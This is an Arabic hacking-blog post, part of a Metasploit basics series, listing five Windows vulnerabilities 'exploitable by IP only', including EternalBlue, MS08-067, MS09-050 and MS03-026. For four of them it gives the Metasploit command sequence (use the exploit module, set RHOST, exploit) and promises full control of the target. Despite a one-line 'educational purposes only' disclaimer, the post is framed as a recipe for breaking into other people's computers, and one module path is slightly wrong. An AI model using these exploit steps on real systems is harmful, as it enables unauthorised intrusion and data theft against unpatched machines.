العالم التقني | Techniworld العالم التقني | Techniworld

الواجهه

صحة

أسسيات الميتاسبلويت2 : أفضل 5 ثغرات للإستغلال حواسيب الوينذوز عن طريق الأي بي فقط

!!!-للأغراض تعليمية فقط :

- موضوع اليوم سيكون حول أفضل 5 ثغرات  للإستغلال حواسيب الوينذوز عن طريق الأي بي فقط  فكما رأينا في أخر موضوع عن أذوات الأمن القومي  ثغرة eternalblue التي أصابت  ملايين من أجهزة الوينذوز  في أسبوع  فهي تحتل المركز الأول :


1-eternalblue :
ثغرة مطورة من طرف  وكالة الأمن القومي تستهذف بروتوكول smb على المنفذ 445 تمكنك من إختراق حاسوب وينذوز وفتح جلسة ميتربريترMeterpreter لتلج إلى معطيات الحاسوب بالإضافة إلى التحكم الكامل بالجهاز .
- أوامر الثغرة :
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 
exploit

2- ms08_067 :
ثغرة نتجت عن خطئ برمجي أصاب ملف NetAPI32.dll قابلة للإستغلال عن طريق الميتا و باستعمال عنوان الأي بي فقط .
- أوامر الثغرة :
use exploit/windows/smb/ms08_067_netapi
set RHOST
exploit

3- adobe_flash_pixel_bender_bof :
ثغرة adobe flash player  التي كانت عبارة عن ثغرة 0-day إستغلالها يمنحك تحكم شامل إلى أن استغلالها صعب نوعا ما لذالك سنخصص موضوع لها قريبا و لأنها أصابت جميع إصدارات الوينذوز .

4- ms09_050 :
ثغرة ملف SRV2.sys  لاكنها لم تصب الحواسيب بل أصابت خادمات وينذوز خصوصا  Windows server 2008 R2
-أوامر الثغرة :
use windows/smb/ms09_050_smb2_negotiate_func_index
set RHOST
exploit

5- ms03_026 :
هذه ثغرة تحتاج أن يكون المستهذف له بورت 135  مفتوح و عادة يكون مفتوح لذى حواسيب windows xp /windows2000/windows2003 .
-أوامر الثغرة :
use exploit/windows/dcerpc/ms03_026_dcom
set RHOST
exploit 

- كان هذا الموضوع لليوم نلتقي في الموضوع القدم بإذن الله وترقبوا الجزء 3
- بالمناسبة لمن يريد تحميل شرح أسسيات الميتا 1  بصيغة pdf   هنا
- ليصلك كل جديد إنضم لقناة العالم التقني techni-world channel أو مجموعتنا على فيسبوك termux official .










عن الكاتب

عدنان التباع

Ceo of

techni world - codename: hack the planet-
  1. شكرا جزيلا على التشجيع

    ردحذف
  2. اخي اريد نسخ المقولة ووضعها في ملف خاص والله مانشرها في اي مدونة الله يخليك اعطيني اياها

    ردحذف

التعليقات



جميع الحقوق محفوظة

العالم التقني | Techniworld